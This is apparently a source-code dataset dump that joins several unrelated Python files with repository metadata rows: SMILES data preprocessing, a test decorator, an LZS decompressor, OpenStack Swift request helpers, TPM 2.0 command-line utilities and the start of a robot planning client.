    hp.save_obj(desc_scaf, f'{save_dir}scaf')
    hp.write_in_file(f'{save_dir}generic_scaffolds.txt', generic_scaf)
    hp.write_in_file(f'{save_dir}scaffolds.txt', scaf)
def draw_scaffolds(top_common, path):
    """Draw the most common scaffolds with RDKit.

    Parameters:
    - top_common (int): how many of the most common scaffolds to draw.
    - path (string): path prefix used both to load the pickled scaffold
      data ('<path>scaf') and to save the output PNGs.
    """
    scaffold_data = hp.load_obj(f'{path}scaf')

    for name_data, data in scaffold_data.items():
        # A few entries are error lists rather than SMILES strings
        # (they occur very rarely); keep only plain strings for drawing.
        data = [entry for entry in data if type(entry) is str]
        counter = collections.Counter(data)
        common = counter.most_common(top_common)
        total = sum(counter.values())
        mols = [Chem.MolFromSmiles(item[0]) for item in common[:top_common]]
        # legend: absolute count plus percentage of all scaffolds
        repet = [str(item[1]) + f'({100*item[1]/total:.2f}%)' for item in common[:top_common]]

        molsPerRow = 5
        grid_image = Draw.MolsToGridImage(mols,
                                          molsPerRow=molsPerRow,
                                          subImgSize=(150,150),
                                          legends=repet)
        grid_image.save(f'{path}top_{top_common}_{name_data}.png')
def do_processing(split, data_path, augmentation, min_len, max_len, save_dir, verbose=True):
    """
    Function to process a dataset.

    Parameters:
    - split (float): fraction of the data that goes in the training set;
      the remainder goes in the validation set (e.g. 0.8 -> 80%/20%).
    - data_path (string): path to the dataset.
    - augmentation (int): number of alternative SMILES added per molecule
      by SMILES enumeration (e.g. 10 gives 11 total representations).
    - min_len (int): minimum length of SMILES to be kept in the dataset.
    - max_len (int): maximum length of SMILES to be kept in the dataset.
    - save_dir (string): directory to save the processed dataset.

    NOTE(review): this function reads the module-level global `save_name`
    (set in __main__) when writing the final files — confirm before reuse.
    """
    # load the data with right SMILES limits,
    # both in a list and in rdkit mol format
    data_ori, data_rdkit = load_data(data_path, min_len, max_len, verbose=verbose)

    # Save the unaugmented data if it was not already saved; it is needed
    # later to check the novelty of generated SMILES.
    # (The original tested `if os.path.isfile(...)`, which wrote the file
    # only when it ALREADY existed — i.e. never on a fresh run.)
    if not os.path.isfile(f'{save_dir}pruned.txt'):
        hp.write_in_file(f'{save_dir}pruned.txt', data_ori)

    if verbose: print('Start data analysis')
    do_data_analysis(data_rdkit, FP.DESCRIPTORS['names'], save_dir)

    # draw top scaffolds
    if verbose: print('Start drawing scaffolds')
    top_common = 20
    draw_scaffolds(top_common, save_dir)

    if verbose: print('Start data processing')
    # define index for the tr-val split
    # and shuffle them
    all_idx = np.arange(len(data_ori))
    idx_split = int(split*len(all_idx))
    np.random.shuffle(all_idx)

    # Guard against idx_split == 0, which happens when there is only one
    # SMILES in the data (e.g. for fine-tuning): reuse the unique SMILES
    # for both the training and the validation set.
    if idx_split == 0:
        idx_tr_canon = [0]
        idx_val_canon = [0]
    else:
        idx_tr_canon = all_idx[:idx_split]
        idx_val_canon = all_idx[idx_split:]

    assert len(idx_tr_canon) != 0
    assert len(idx_val_canon) != 0

    if verbose:
        print(f'Size of the training set after split: {len(idx_tr_canon)}')
        print(f'Size of the validation set after split: {len(idx_val_canon)}')

    d = dict(enumerate(data_ori))
    data_tr = [d.get(item) for item in idx_tr_canon]
    data_val = [d.get(item) for item in idx_val_canon]
    hp.write_in_file(f'{save_dir}data_tr.txt', data_tr)
    hp.write_in_file(f'{save_dir}data_val.txt', data_val)

    if augmentation > 0:
        if verbose:
            print(f'Data augmentation {augmentation}-fold start')

        # Augment the training and validation splits separately so the same
        # molecule is never represented (via an alternative SMILES) in both.
        tr_aug = augment_dataset(data_tr, augmentation, min_len, max_len, verbose=False)
        val_aug = augment_dataset(data_val, augmentation, min_len, max_len, verbose=False)

        # Merge with the original data and shuffle
        full_training_set = list(set(data_tr + tr_aug))
        shuffle(full_training_set)
        full_validation_set = list(set(data_val + val_aug))
        shuffle(full_validation_set)
        full_datalist = full_training_set + full_validation_set

        if verbose:
            print(f'Size of the training set after agumentation: {len(full_training_set)}')
            print(f'Size of the validation set after agumentation: {len(full_validation_set)}')

        # Create the partitions for the data generators
        # with the full augmented dataset
        idx_tr = np.arange(len(full_training_set))
        idx_val = np.arange(len(full_training_set), len(full_training_set) + len(full_validation_set))

        # Save
        hp.write_in_file(f'{save_dir}{save_name}.txt', full_datalist)
        hp.save_obj(list(idx_tr), save_dir + 'idx_tr')
        hp.save_obj(list(idx_val), save_dir + 'idx_val')
    else:
        # Save
        hp.write_in_file(f'{save_dir}{save_name}.txt', data_ori)
        hp.save_obj(list(idx_tr_canon), f'{save_dir}idx_tr')
        hp.save_obj(list(idx_val_canon), f'{save_dir}idx_val')
if __name__ == '__main__':
    start = time.time()
    ####################################
    # get back command-line parameters
    args = vars(parser.parse_args())
    verbose = args['verbose']
    filename = args['filename']
    # dataset name = file name without directory and .txt extension
    name_data = filename.split('/')[-1].replace('.txt','')
    config = configparser.ConfigParser()
    config.read('parameters.ini')
    # get back the experiment parameters
    min_len = int(config['PROCESSING']['min_len'])
    max_len = int(config['PROCESSING']['max_len'])
    split = float(config['PROCESSING']['split'])
    mode = config['EXPERIMENTS']['mode']
    # check if experiment mode exists
    if mode not in ['training', 'fine_tuning']:
        raise ValueError('The mode you picked does not exist. Available: training and fine_tuning')
    if verbose:
        print('\nSTART PROCESSING')
        print(f'Experiment mode: {mode}')
    ####################################
    ####################################
    # define the path to the data files
    # and process all the data we need
    dir_data = 'results/data/'
    for key in config['DATA']:
        name = config['DATA'][key]
        if name:
            print(f'\nCurrent data being processed: {name}')
            full_data_path = f'../data/{name}'
            name = name.replace('.txt', '')
            # define saving path
            # experiment parameters depending on the mode
            aug = int(config['AUGMENTATION'][key])
            # NOTE(review): the literal '72,520' looks out of place here —
            # presumably max_len was meant to be interpolated; confirm.
            save_name = f'{min_len}_72,520_x{aug}'
            save_dir = f'{dir_data}{name}/{save_name}/'
            os.makedirs(save_dir, exist_ok=True)
            # Check first if the training data was already done;
            # if yes, we skip the processing.
            if os.path.isfile(f'{save_dir}{save_name}.txt'):
                print(f'Data {save_name} already exist in dir {name}; skipping processing.')
            else:
                # NOTE: do_processing also reads save_name as a global
                do_processing(split, full_data_path, aug, min_len, max_len,
                              save_dir, verbose=verbose)
    # and the fine-tuning data given as arg to the script
    full_data_path = f'../data/{name_data}.txt'
    aug = int(config['AUGMENTATION']['fine_tuning'])
    save_name = f'{min_len}_72,520_x{aug}'
    save_dir = f'{dir_data}{name_data}/{save_name}/'
    os.makedirs(save_dir, exist_ok=True)
    # Check first if the training data was already done;
    # if yes, we skip the processing.
    # NOTE(review): `name` below is left over from the loop above and is
    # undefined if the DATA section was empty — confirm.
    if os.path.isfile(f'{save_dir}{save_name}.txt'):
        print(f'Data {save_name} already exist in dir {name}; skipping processing.')
    else:
        do_processing(split, full_data_path, aug, min_len, max_len,
                      save_dir, verbose=verbose)
    end = time.time()
    print(f'PROCESSING DONE in {end - start:.04} seconds')
    ####################################
| 37.75 | 105 | 0.633128 |
1763812f94632dfd9c931c11db77193963eb7c5b | 84 | py | Python | tests/Unit_Tests/decorator.py | Yayg/ripe | 8bb090ecb84bf45d3fc5bc008683ee84a74888ab | [
"MIT"
] | null | null | null | tests/Unit_Tests/decorator.py | Yayg/ripe | 8bb090ecb84bf45d3fc5bc008683ee84a74888ab | [
"MIT"
] | 1 | 2019-09-27T11:41:42.000Z | 2019-09-27T11:41:42.000Z | tests/Unit_Tests/decorator.py | Yayg/rift | 8bb090ecb84bf45d3fc5bc008683ee84a74888ab | [
"MIT"
] | null | null | null | import rift
# @rift.Test registers the function with rift's test runner.
@rift.Test
def test_decorator():
    # Body just prints; the runner decides pass/fail.
    print("Passed")
# Execute every test registered via @rift.Test.
rift.run_tests()
| 10.5 | 21 | 0.702381 |
4f326a25217703035c82058d8a84e9f550088334 | 3,451 | py | Python | rombuster/deps/lzs_decompress.py | EntySec/RomBuster | 01b053eb33fbf1aef5d68922803219af58bfa10f | [
"MIT"
] | 175 | 2021-05-18T19:56:42.000Z | 2022-03-30T04:35:21.000Z | rombuster/deps/lzs_decompress.py | lollipop31/RomBuster | c858279b59d3345375e9944dbf760a0d9d7b0796 | [
"MIT"
] | 1 | 2021-07-07T07:11:08.000Z | 2021-07-07T09:25:02.000Z | rombuster/deps/lzs_decompress.py | lollipop31/RomBuster | c858279b59d3345375e9944dbf760a0d9d7b0796 | [
"MIT"
] | 35 | 2021-05-19T19:08:02.000Z | 2022-03-25T17:33:28.000Z | #!/usr/bin/env python3
##############################################################
# Lempel-Ziv-Stac decompression
# BitReader and RingList classes
#
# Copyright (C) 2011 Filippo Valsorda - FiloSottile
# filosottile.wiki gmail.com - www.pytux.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################
import re
import random
import string
import collections
class BitReader:
    """MSB-first bit-stream reader over a byte sequence."""

    def __init__(self, data_bytes):
        # Flatten the input into a queue of booleans, most significant
        # bit of each byte first.
        self._bits = collections.deque()
        for byte in data_bytes:
            for shift in range(7, -1, -1):
                self._bits.append(bool((byte >> shift) & 1))

    def getBit(self):
        """Pop and return the next bit as a bool."""
        return self._bits.popleft()

    def getBits(self, num):
        """Pop *num* bits and return them as an unsigned integer."""
        value = 0
        for _ in range(num):
            value = (value << 1) | self.getBit()
        return value

    def getByte(self):
        """Pop the next 8 bits as an integer."""
        return self.getBits(8)

    def __len__(self):
        """Number of bits remaining in the stream."""
        return len(self._bits)
class RingList:
    """Fixed-capacity FIFO buffer: once full, each append evicts the
    oldest element so the size never exceeds the configured maximum."""

    def __init__(self, length):
        self.__data__ = collections.deque()
        self.__full__ = False
        self.__max__ = length

    def append(self, x):
        """Add *x*, evicting the oldest element when at capacity."""
        if self.__full__:
            self.__data__.popleft()
        self.__data__.append(x)
        if not self.__full__ and self.size() == self.__max__:
            self.__full__ = True

    def get(self):
        """Return the underlying deque."""
        return self.__data__

    def size(self):
        """Current number of stored elements."""
        return len(self.__data__)

    def maxsize(self):
        """Configured capacity."""
        return self.__max__

    def __getitem__(self, index):
        # Non-negative out-of-range indices yield None instead of raising;
        # negative indices index from the right as usual for a deque.
        if index >= self.size():
            return None
        return self.__data__[index]
def LZSDecompress(data, window=None):
    """Decompress Lempel-Ziv-Stac compressed *data*.

    :param data: the compressed byte sequence
    :param window: optional RingList used as the history window; when
        omitted a fresh 2048-entry window is created for this call.
    :returns: tuple (decompressed string, window)
    """
    # The original used a mutable default argument (window=RingList(2048)),
    # evaluated once at definition time, so the history window leaked
    # between independent calls. Create a fresh one per call instead.
    if window is None:
        window = RingList(2048)
    reader = BitReader(data)
    chunks = []  # output characters, joined once at the end (O(n), not O(n^2))
    while True:
        bit = reader.getBit()
        if not bit:
            # Literal byte: 0 flag followed by 8 raw bits.
            char = reader.getByte()
            chunks.append(chr(char))
            window.append(char)
        else:
            # Back-reference: flag bit selects 7-bit or 11-bit offset.
            bit = reader.getBit()
            if bit:
                offset = reader.getBits(7)
                if offset == 0:
                    # EOF marker
                    break
            else:
                offset = reader.getBits(11)
            # Variable-length length field per the LZS encoding.
            lenField = reader.getBits(2)
            if lenField < 3:
                length = lenField + 2
            else:
                lenField <<= 2
                lenField += reader.getBits(2)
                if lenField < 15:
                    length = (lenField & 0x0f) + 5
                else:
                    lenCounter = 0
                    lenField = reader.getBits(4)
                    while lenField == 15:
                        lenField = reader.getBits(4)
                        lenCounter += 1
                    length = 15 * lenCounter + 8 + lenField
            # Copy `length` bytes from `offset` back in the window; copying
            # one byte at a time allows overlapping references.
            for _ in range(length):
                char = window[-offset]
                chunks.append(chr(char))
                window.append(char)
    result = ''.join(chunks)
    return result, window
| 27.830645 | 77 | 0.534628 |
98a239e69ad267e9fa5826e6fbe08ca91ebf7a01 | 15,510 | py | Python | swift/common/request_helpers.py | tsg-/swift-ec | d5cc4d274696b587e820050774db4ca2c3d9c85c | [
"Apache-2.0"
] | null | null | null | swift/common/request_helpers.py | tsg-/swift-ec | d5cc4d274696b587e820050774db4ca2c3d9c85c | [
"Apache-2.0"
] | null | null | null | swift/common/request_helpers.py | tsg-/swift-ec | d5cc4d274696b587e820050774db4ca2c3d9c85c | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2010-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Miscellaneous utility functions for use in generating responses.
Why not swift.common.utils, you ask? Because this way we can import things
from swob in here without creating circular imports.
"""
import hashlib
import sys
import time
from contextlib import contextmanager
from urllib import unquote
from swift.common.constraints import FORMAT2CONTENT_TYPE
from swift.common.exceptions import ListingIterError, SegmentError
from swift.common.http import is_success, HTTP_SERVICE_UNAVAILABLE
from swift.common.swob import HTTPBadRequest, HTTPNotAcceptable
from swift.common.utils import split_path, validate_device_partition
from swift.common.wsgi import make_subrequest
def get_param(req, name, default=None):
    """
    Get parameters from an HTTP request ensuring proper handling UTF-8
    encoding.

    :param req: request object
    :param name: parameter name
    :param default: result to return if the parameter is not found
    :returns: HTTP request parameter value
              (as UTF-8 encoded str, not unicode object)
    :raises: HTTPBadRequest if param not valid UTF-8 byte sequence
    """
    value = req.params.get(name, default)
    # Empty/missing values and already-decoded unicode need no validation.
    if not value or isinstance(value, unicode):
        return value
    try:
        value.decode('utf8')  # Ensure UTF8ness
    except UnicodeDecodeError:
        raise HTTPBadRequest(
            request=req, content_type='text/plain',
            body='"%s" parameter not valid UTF-8' % name)
    return value
def get_listing_content_type(req):
    """
    Determine the content type to use for an account or container listing
    response.

    :param req: request object
    :returns: content type as a string (e.g. text/plain, application/json)
    :raises: HTTPNotAcceptable if the requested content type is not acceptable
    :raises: HTTPBadRequest if the 'format' query param is provided and
             not valid UTF-8
    """
    requested_format = get_param(req, 'format')
    if requested_format:
        # The 'format' query parameter overrides the Accept header;
        # unknown formats fall back to plain text.
        req.accept = FORMAT2CONTENT_TYPE.get(
            requested_format.lower(), FORMAT2CONTENT_TYPE['plain'])
    supported = ['text/plain', 'application/json', 'application/xml', 'text/xml']
    out_content_type = req.accept.best_match(supported)
    if not out_content_type:
        raise HTTPNotAcceptable(request=req)
    return out_content_type
def split_and_validate_path(request, minsegs=1, maxsegs=None,
                            rest_with_last=False):
    """
    Utility function to split and validate the request path.

    :returns: result of split_path if everything's okay
    :raises: HTTPBadRequest if something's not okay
    """
    try:
        segs = split_path(unquote(request.path),
                          minsegs, maxsegs, rest_with_last)
        # first two segments are device and partition
        validate_device_partition(segs[0], segs[1])
    except ValueError as err:
        raise HTTPBadRequest(body=str(err), request=request,
                             content_type='text/plain')
    return segs
def is_user_meta(server_type, key):
    """
    Tests if a header key starts with and is longer than the user
    metadata prefix for given server type.

    :param server_type: type of backend server i.e. [account|container|object]
    :param key: header key
    :returns: True if the key satisfies the test, False otherwise
    """
    prefix = get_user_meta_prefix(server_type)
    # the key must extend past the prefix, i.e. carry a non-empty meta name
    return len(key) > len(prefix) and key.lower().startswith(prefix)
def is_sys_meta(server_type, key):
    """
    Tests if a header key starts with and is longer than the system
    metadata prefix for given server type.

    :param server_type: type of backend server i.e. [account|container|object]
    :param key: header key
    :returns: True if the key satisfies the test, False otherwise
    """
    prefix = get_sys_meta_prefix(server_type)
    # the key must extend past the prefix, i.e. carry a non-empty meta name
    return len(key) > len(prefix) and key.lower().startswith(prefix)
def is_sys_or_user_meta(server_type, key):
    """
    Tests if a header key starts with and is longer than the user or system
    metadata prefix for given server type.

    :param server_type: type of backend server i.e. [account|container|object]
    :param key: header key
    :returns: True if the key satisfies the test, False otherwise
    """
    for check in (is_user_meta, is_sys_meta):
        if check(server_type, key):
            return True
    return False
def strip_user_meta_prefix(server_type, key):
    """
    Removes the user metadata prefix for a given server type from the start
    of a header key.

    :param server_type: type of backend server i.e. [account|container|object]
    :param key: header key
    :returns: stripped header key
    """
    prefix_length = len(get_user_meta_prefix(server_type))
    return key[prefix_length:]
def strip_sys_meta_prefix(server_type, key):
    """
    Removes the system metadata prefix for a given server type from the start
    of a header key.

    :param server_type: type of backend server i.e. [account|container|object]
    :param key: header key
    :returns: stripped header key
    """
    prefix_length = len(get_sys_meta_prefix(server_type))
    return key[prefix_length:]
def get_user_meta_prefix(server_type):
    """
    Returns the prefix for user metadata headers for given server type.

    This prefix defines the namespace for headers that will be persisted
    by backend servers.

    :param server_type: type of backend server i.e. [account|container|object]
    :returns: prefix string for server type's user metadata headers
    """
    server = server_type.lower()
    return 'x-%s-%s-' % (server, 'meta')
def get_sys_meta_prefix(server_type):
    """
    Returns the prefix for system metadata headers for given server type.

    This prefix defines the namespace for headers that will be persisted
    by backend servers.

    :param server_type: type of backend server i.e. [account|container|object]
    :returns: prefix string for server type's system metadata headers
    """
    server = server_type.lower()
    return 'x-%s-%s-' % (server, 'sysmeta')
def remove_items(headers, condition):
    """
    Removes items from a dict whose keys satisfy
    the given condition.

    :param headers: a dict of headers
    :param condition: a function that will be passed the header key as a
                      single argument and should return True if the header
                      is to be removed.
    :returns: a dict, possibly empty, of headers that have been removed
    """
    # Materialize the matching keys first: on Python 3 filter() is lazy,
    # and popping from the dict while iterating over it raises
    # "RuntimeError: dictionary changed size during iteration".
    keys = [key for key in headers if condition(key)]
    removed = {key: headers.pop(key) for key in keys}
    return removed
def close_if_possible(maybe_closable):
    """Call close() on *maybe_closable* if it has one; otherwise no-op.

    Returns whatever close() returns, or None when there is nothing to call.
    """
    closer = getattr(maybe_closable, 'close', None)
    if not callable(closer):
        return None
    return closer()
@contextmanager
def closing_if_possible(maybe_closable):
    """
    Like contextlib.closing(), but doesn't crash if the object lacks a close()
    method.

    PEP 333 (WSGI) says: "If the iterable returned by the application has a
    close() method, the server or gateway must call that method upon
    completion of the current request[.]" This function makes that easier.
    """
    # NOTE(review): unlike contextlib.closing there is no try/finally here,
    # so close is skipped when the with-body raises — confirm intentional.
    yield maybe_closable
    close_if_possible(maybe_closable)
class SegmentedIterable(object):
    """
    Iterable that returns the object contents for a large object.

    :param req: original request object
    :param app: WSGI application from which segments will come
    :param listing_iter: iterable yielding the object segments to fetch.
                         NOTE(review): the code below unpacks 5-tuples
                         (path, etag, size, first-byte, last-byte); the
                         original 3-tuple description appears stale —
                         confirm against the producers of this iterable.
    :param max_get_time: maximum permitted duration of a GET request (seconds)
    :param logger: logger object
    :param swift_source: value of swift.source in subrequest environ
                         (just for logging)
    :param ua_suffix: string to append to user-agent.
    :param name: name of manifest (used in logging only)
    :param response: optional response object for the response being sent
                     to the client.
    """

    def __init__(self, req, app, listing_iter, max_get_time,
                 logger, ua_suffix, swift_source,
                 name='<not specified>', response=None):
        self.req = req
        self.app = app
        self.listing_iter = listing_iter
        self.max_get_time = max_get_time
        self.logger = logger
        # leading space so the suffix concatenates cleanly onto the agent
        self.ua_suffix = " " + ua_suffix
        self.swift_source = swift_source
        self.name = name
        self.response = response

    def app_iter_range(self, *a, **kw):
        """
        swob.Response will only respond with a 206 status in certain cases; one
        of those is if the body iterator responds to .app_iter_range().

        However, this object (or really, its listing iter) is smart enough to
        handle the range stuff internally, so we just no-op this out for swob.
        """
        return self

    def __iter__(self):
        """Fetch each segment via a subrequest and yield its body chunks,
        enforcing the time limit, per-segment etag/size checks, and the
        declared overall content length."""
        start_time = time.time()
        have_yielded_data = False

        # Track how many bytes the client was promised (if known) so we
        # never yield more and can detect a short body at the end.
        if self.response and self.response.content_length:
            bytes_left = int(self.response.content_length)
        else:
            bytes_left = None

        try:
            for seg_path, seg_etag, seg_size, first_byte, last_byte \
                    in self.listing_iter:
                if time.time() - start_time > self.max_get_time:
                    raise SegmentError(
                        'ERROR: While processing manifest %s, '
                        'max LO GET time of %ds exceeded' %
                        (self.name, self.max_get_time))
                # Make sure that the segment is a plain old object, not some
                # flavor of large object, so that we can check its MD5.
                path = seg_path + '?multipart-manifest=get'
                seg_req = make_subrequest(
                    self.req.environ, path=path, method='GET',
                    headers={'x-auth-token': self.req.headers.get(
                        'x-auth-token')},
                    agent=('%(orig)s ' + self.ua_suffix),
                    swift_source=self.swift_source)
                if first_byte is not None or last_byte is not None:
                    seg_req.headers['Range'] = "bytes=%s-%s" % (
                        # The 0 is to avoid having a range like "bytes=-10",
                        # which actually means the *last* 10 bytes.
                        '0' if first_byte is None else first_byte,
                        '' if last_byte is None else last_byte)

                seg_resp = seg_req.get_response(self.app)
                if not is_success(seg_resp.status_int):
                    close_if_possible(seg_resp.app_iter)
                    raise SegmentError(
                        'ERROR: While processing manifest %s, '
                        'got %d while retrieving %s' %
                        (self.name, seg_resp.status_int, seg_path))
                elif ((seg_etag and (seg_resp.etag != seg_etag)) or
                        (seg_size and (seg_resp.content_length != seg_size) and
                         not seg_req.range)):
                    # The content-length check is for security reasons. Seems
                    # possible that an attacker could upload a >1mb object and
                    # then replace it with a much smaller object with same
                    # etag. Then create a big nested SLO that calls that
                    # object many times which would hammer our obj servers. If
                    # this is a range request, don't check content-length
                    # because it won't match.
                    close_if_possible(seg_resp.app_iter)
                    raise SegmentError(
                        'Object segment no longer valid: '
                        '%(path)s etag: %(r_etag)s != %(s_etag)s or '
                        '%(r_size)s != %(s_size)s.' %
                        {'path': seg_req.path, 'r_etag': seg_resp.etag,
                         'r_size': seg_resp.content_length,
                         's_etag': seg_etag,
                         's_size': seg_size})

                # Stream the segment body, hashing as we go so the etag can
                # be verified after the last chunk.
                seg_hash = hashlib.md5()
                for chunk in seg_resp.app_iter:
                    seg_hash.update(chunk)
                    have_yielded_data = True
                    if bytes_left is None:
                        yield chunk
                    elif bytes_left >= len(chunk):
                        yield chunk
                        bytes_left -= len(chunk)
                    else:
                        # Segment data exceeds the declared content length:
                        # yield only the remainder, then abort.
                        yield chunk[:bytes_left]
                        bytes_left -= len(chunk)
                        close_if_possible(seg_resp.app_iter)
                        raise SegmentError(
                            'Too many bytes for %(name)s; truncating in '
                            '%(seg)s with %(left)d bytes left' %
                            {'name': self.name, 'seg': seg_req.path,
                             'left': bytes_left})
                close_if_possible(seg_resp.app_iter)

                # Whole-segment MD5 check only makes sense when the full
                # body (no Range) was fetched.
                if seg_resp.etag and seg_hash.hexdigest() != seg_resp.etag \
                        and first_byte is None and last_byte is None:
                    raise SegmentError(
                        "Bad MD5 checksum in %(name)s for %(seg)s: headers had"
                        " %(etag)s, but object MD5 was actually %(actual)s" %
                        {'seg': seg_req.path, 'etag': seg_resp.etag,
                         'name': self.name, 'actual': seg_hash.hexdigest()})

            if bytes_left:
                raise SegmentError(
                    'Not enough bytes for %s; closing connection' %
                    self.name)
        except ListingIterError as err:
            # I have to save this error because yielding the ' ' below clears
            # the exception from the current stack frame.
            excinfo = sys.exc_info()
            self.logger.exception('ERROR: While processing manifest %s, %s',
                                  self.name, err)
            # Normally, exceptions before any data has been yielded will
            # cause Eventlet to send a 5xx response. In this particular
            # case of ListingIterError we don't want that and we'd rather
            # just send the normal 2xx response and then hang up early
            # since 5xx codes are often used to judge Service Level
            # Agreements and this ListingIterError indicates the user has
            # created an invalid condition.
            if not have_yielded_data:
                yield ' '
            # NOTE(review): raising a sys.exc_info() tuple is Python 2-only
            # behavior — confirm before porting to Python 3.
            raise excinfo
        except SegmentError as err:
            self.logger.exception(err)
            # This doesn't actually change the response status (we're too
            # late for that), but this does make it to the logs.
            if self.response:
                self.response.status = HTTP_SERVICE_UNAVAILABLE
            raise
| 40.285714 | 79 | 0.616054 |
7d64e9ec9259adac6d3b5ff021579b52164a7aff | 3,569 | py | Python | Python_TPM20_GUI/shell_util.py | RaymWong/optiga-tpm-explorer | 9a05849205784c4540f22d757f521092c86f2135 | [
"MIT"
] | 1 | 2022-02-09T20:46:05.000Z | 2022-02-09T20:46:05.000Z | Python_TPM20_GUI/shell_util.py | RaymWong/optiga-tpm-explorer | 9a05849205784c4540f22d757f521092c86f2135 | [
"MIT"
] | null | null | null | Python_TPM20_GUI/shell_util.py | RaymWong/optiga-tpm-explorer | 9a05849205784c4540f22d757f521092c86f2135 | [
"MIT"
] | 1 | 2022-02-15T02:36:28.000Z | 2022-02-15T02:36:28.000Z | import subprocess
import os
from subprocess import PIPE
# Variables to hold the 3 authorisation values
# (hard-coded demo credentials for the TPM owner / NV / endorsement /
# lockout hierarchies — not suitable for production use)
ownerAuth = "owner123"
nvAuth = "nv123"
endorseAuth = "endorsement123"
lockoutAuth = "lockout123"

# Minimal OpenSSL configuration enabling the tpm2tss engine; the owner
# authorisation above is interpolated into SET_OWNERAUTH.
openssl_cnf=("openssl_conf = openssl_init\n"
    "[openssl_init]\n"
    "engines = engine_section\n"
    "[engine_section]\n"
    "tpm2tss = tpm2tss_section\n"
    "[tpm2tss_section]\n"
    "engine_id = tpm2tss\n"
    #~ "dynamic_path = /usr/lib/arm-linux-gnueabihf/engines-1.1/libtpm2tss.so\n"
    "default_algorithms = ALL\n"
    "init = 1\n"
    "SET_OWNERAUTH = %s\n"
    "[req]\n"
    "distinguished_name = subject\n"
    "[subject]\n" % ownerAuth)
def convertInputToHex(input_str, req_length):
    """Normalize a hex string to exactly *req_length* characters.

    The input is parsed as hexadecimal; shorter results are right-padded
    with '0', longer ones are truncated. Returns the int 0 (not a string)
    when the input cannot be parsed as hex.
    """
    try:
        # hex() yields '0x...'; [2:] drops the prefix, strip("L") removes
        # the Python 2 long suffix
        parsed = (hex(int(input_str, 16))[2:]).strip("L")
    except ValueError:
        return 0
    # right-pad with zeroes up to the requested length, then truncate
    padded = parsed + "0" * max(0, req_length - len(parsed))
    return padded[:req_length]
def checkDir():
    """Ensure ./working_space/ exists, create it if needed, and chdir into it."""
    target = "./working_space/"
    if not os.path.exists(target):
        os.makedirs(target)
    os.chdir(target)
# Executes the supplied shell script on the command line
def execShellScript(fullpath):
output = ""
try:
print(input)
output = subprocess.check_output([sh, str(fullpath)], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
print("ERROR")
print(output.decode())
return(output.decode())
# Executes a command on the command line
def execTpmToolsAndCheck(cmd, allowFail=True):
output = ""
try:
print((">>> ", " ".join(cmd)))
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
print(("{0} returned {1}".format(cmd[0], e.returncode)))
if ("error" in str(output).lower()) or ("fail" in str(output).lower()):
if not allowFail:
print(("ERROR in {0}".format(cmd[0])))
print((str(output)))
exit()
print((str(output.decode())))
return(output.decode())
# Executes the supplied command parameters with OpenSSL
def execCLI(cmd):
output = ""
try:
print((">>> ", " ".join(cmd)))
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
print("ERROR")
print(output.decode())
return(output.decode())
def createProcess(cmd, file):
    """Spawn *cmd* through the shell with stdin/stdout piped and stderr
    merged into stdout; returns the Popen handle.

    NOTE(review): *file* is accepted but never used, and Popen itself does
    not raise CalledProcessError, so the except branch is effectively
    unreachable -- both preserved to mirror the original control flow.
    """
    proc = ""
    try:
        proc = subprocess.Popen(
            cmd,
            shell=True,
            stdout=subprocess.PIPE,
            stdin=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
    except subprocess.CalledProcessError as e:
        proc = e.output
        print("ERROR")
        print(proc)
    return proc
def createProcess_PIPE(cmd, file):
    """Spawn *cmd* through the shell with only stdout piped; returns the
    Popen handle.

    NOTE(review): *file* is unused and the CalledProcessError handler is
    effectively unreachable (Popen does not raise it) -- preserved as-is.
    """
    proc = ""
    try:
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    except subprocess.CalledProcessError as e:
        proc = e.output
        print("ERROR")
        print(proc)
    return proc
| 29.495868 | 121 | 0.616419 |
6fc5217341a4c28d1668a1beb07116bc2c540356 | 7,664 | py | Python | python/mujincontrollerclient/realtimeitlplanningclient.py | mqcmd196/mujincontrollerclientpy | 6f26143d7c64407c913561edafd3f459a2909900 | [
"Apache-2.0"
] | null | null | null | python/mujincontrollerclient/realtimeitlplanningclient.py | mqcmd196/mujincontrollerclientpy | 6f26143d7c64407c913561edafd3f459a2909900 | [
"Apache-2.0"
] | null | null | null | python/mujincontrollerclient/realtimeitlplanningclient.py | mqcmd196/mujincontrollerclientpy | 6f26143d7c64407c913561edafd3f459a2909900 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2013-2015 MUJIN Inc.
# Mujin controller client for bin picking task
# mujin imports
from . import realtimerobotclient
# logging
import logging
log = logging.getLogger(__name__)
class RealtimeITLPlanningControllerClient(realtimerobotclient.RealtimeRobotControllerClient):
    """Mujin controller client for the realtimeitlplanning task.

    Every public method assembles a task-parameter dict for one planning
    command and forwards it through ExecuteCommand on the parent class.

    NOTE(review): several step-control methods accept an ``envclearance``
    argument that is never forwarded in their task parameters; preserved
    as-is.
    """

    def __init__(self, **kwargs):
        """Logs into the mujin controller, initializes the
        realtimeitlplanning task, and sets up parameters.

        :param controllerurl: url of the mujin controller, e.g. http://controller13
        :param controllerusername: username of the mujin controller, e.g. testuser
        :param controllerpassword: password of the mujin controller
        :param taskzmqport: port of the realtimeitlplanning task's zmq server, e.g. 7110
        :param taskheartbeatport: port of the task's zmq heartbeat publisher, e.g. 7111
